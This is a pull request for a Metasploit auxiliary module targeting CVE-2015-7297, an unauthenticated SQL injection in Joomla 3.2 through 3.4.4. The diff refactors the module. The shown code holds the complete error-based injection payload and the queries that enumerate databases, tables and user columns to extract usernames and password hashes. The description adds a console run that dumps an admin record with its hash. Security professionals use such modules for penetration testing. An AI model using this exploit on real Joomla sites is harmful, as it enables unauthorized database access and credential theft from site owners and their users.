### PR TITLE
Add initial joomla_contenthistory_sqli module (CVE-2015-7297)

### DIFF
--- a/modules/auxiliary/gather/joomla_contenthistory_sqli.rb
+++ b/modules/auxiliary/gather/joomla_contenthistory_sqli.rb
@@ -15,8 +15,7 @@ class Metasploit4 < Msf::Auxiliary
       'Name'           => 'Joomla com_contenthistory Error-Based SQL Injection',
       'Description'    => %q{
         This module exploits a SQL injection vulnerability in Joomla versions 3.2
-        through 3.4.4 in order to either enumerate usernames and password hashes
-        or session IDs.
+        through 3.4.4 in order to either enumerate usernames and password hashes.
       },
       'References'     =>
         [

--- a/modules/auxiliary/gather/joomla_contenthistory_sqli.rb
+++ b/modules/auxiliary/gather/joomla_contenthistory_sqli.rb
@@ -60,29 +60,29 @@ class Metasploit4 < Msf::Auxiliary
 
   end
 
-  def request(query)
-    query = "#{$payload}" % query
+  def request(query, payload, lmark, rmark)
+    query = "#{payload}" % query
     res = sqli(query)
 
     # Error based SQL Injection
-    if res && res.code == 500 && res.body =~ /#{$lmark}(.*)#{$rmark}/
+    if res && res.code == 500 && res.body =~ /#{lmark}(.*)#{rmark}/
       $1
     end
   end
 
-  def query_databases
+  def query_databases(payload, lmark, rmark)
     dbs = []
 
     query = '(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) '
     query << 'FROM INFORMATION_SCHEMA.SCHEMATA)'
 
-    dbc = request(query)
+    dbc = request(query, payload, lmark, rmark)
 
     query_fmt = '(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) '
     query_fmt << 'FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1)'
 
     0.upto(dbc.to_i - 1) do |i|
-      dbname = request(query_fmt % i)
+      dbname = request(query_fmt % i, payload, lmark, rmark)
       dbs << dbname
       vprint_good(dbname)
     end
@@ -93,14 +93,14 @@ class Metasploit4 < Msf::Auxiliary
     dbs
   end
 
-  def query_tables(database)
+  def query_tables(database, payload, lmark, rmark)
     tbs = []
 
     query = '(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) '
     query << 'FROM INFORMATION_SCHEMA.TABLES '
     query << "WHERE table_schema IN (0x#{database.unpack('H*')[0]}))"
 
-    tbc = request(query)
+    tbc = request(query, payload, lmark, rmark)
 
     query_fmt = '(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) '
     query_fmt << 'FROM INFORMATION_SCHEMA.TABLES '
@@ -109,18 +109,18 @@ class Metasploit4 < Msf::Auxiliary
 
     vprint_status('tables in database: %s' % database)
     0.upto(tbc.to_i - 1) do |i|
-      tbname = request(query_fmt % i)
+      tbname = request(query_fmt % i, payload, lmark, rmark)
       vprint_good(tbname)
       tbs << tbname if tbname =~ /_users$/
     end
     tbs
   end
 
-  def query_columns(database, table)
+  def query_columns(database, table, payload, lmark, rmark)
     cols = []
     query = "(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{database}.#{table})"
 
-    colc = request(query)
+    colc = request(query, payload, lmark, rmark)
     vprint_status(colc)
 
     valid_cols = [   # joomla_users
@@ -151,7 +151,7 @@ class Metasploit4 < Msf::Auxiliary
         l = 1
         record[col] = ''
         loop do
-          value = request(query_fmt % [col, l, i])
+          value = request(query_fmt % [col, l, i], payload, lmark, rmark)
           break if value.blank?
           record[col] << value
           l += 54
@@ -164,21 +164,21 @@ class Metasploit4 < Msf::Auxiliary
   end
 
   def run
-    $lmark = Rex::Text.rand_text_alpha(5)
-    $rmark = Rex::Text.rand_text_alpha(5)
+    lmark = Rex::Text.rand_text_alpha(5)
+    rmark = Rex::Text.rand_text_alpha(5)
 
-    $payload = 'AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT('
-    $payload << "0x#{$lmark.unpack('H*')[0]},"
-    $payload << '%s,'
-    $payload << "0x#{$rmark.unpack('H*')[0]},"
-    $payload << 'FLOOR(RAND(0)*2)'
-    $payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
+    payload = 'AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT('
+    payload << "0x#{lmark.unpack('H*')[0]},"
+    payload << '%s,'
+    payload << "0x#{rmark.unpack('H*')[0]},"
+    payload << 'FLOOR(RAND(0)*2)'
+    payload << ')x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'
 
-    dbs = query_databases
+    dbs = query_databases(payload, lmark, rmark)
     dbs.each do |db|
-      tables = query_tables(db)
+      tables = query_tables(db, payload, lmark, rmark)
       tables.each do |table|
-        cols = query_columns(db, table)
+        cols = query_columns(db, table, payload, lmark, rmark)
         next if cols.blank?
         path = store_loot(
           'joomla.users',


### PR DESCRIPTION
This is a WIP for the recent Joomla com_contenthistory unauthenticated SQL injection.

```
msf auxiliary(joomla_contenthistory_sqli) > show options

Module options (auxiliary/gather/joomla_contenthistory_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   ACTION     HASHES           yes       Enumerate session IDs [SESSIONS] or password hashes [HASHES]
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      172.31.16.13     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The relative URI of the Joomla instance
   VHOST                       no        HTTP server virtual host

msf auxiliary(joomla_contenthistory_sqli) > run
"[{\"activation\":\"0\",\"block\":\"0\",\"email\":\"jfdsl@jfdslaf.com\",\"id\":\"378\",\"lastResetTime\":\"0000-00-00 00:00:00\",\"lastvisitDate\":\"2015-10-22 19:55:32\",\"name\":\"Super User\",\"otep\":\"\",\"otpKey\":\"\",\"params\":\"\",\"password\":\"$2y$10$iSdctySg.NSgPh0B4dW6PeinOj/9QvNS5VIzElhvcqsGrDVtCicia\",\"registerDate\":\"2015-10-22 16:39:53\",\"requireReset\":\"0\",\"resetCount\":\"0\",\"sendEmail\":\"1\",\"username\":\"admin\"}]"
[*] Auxiliary module execution completed
msf auxiliary(joomla_contenthistory_sqli) > 

```
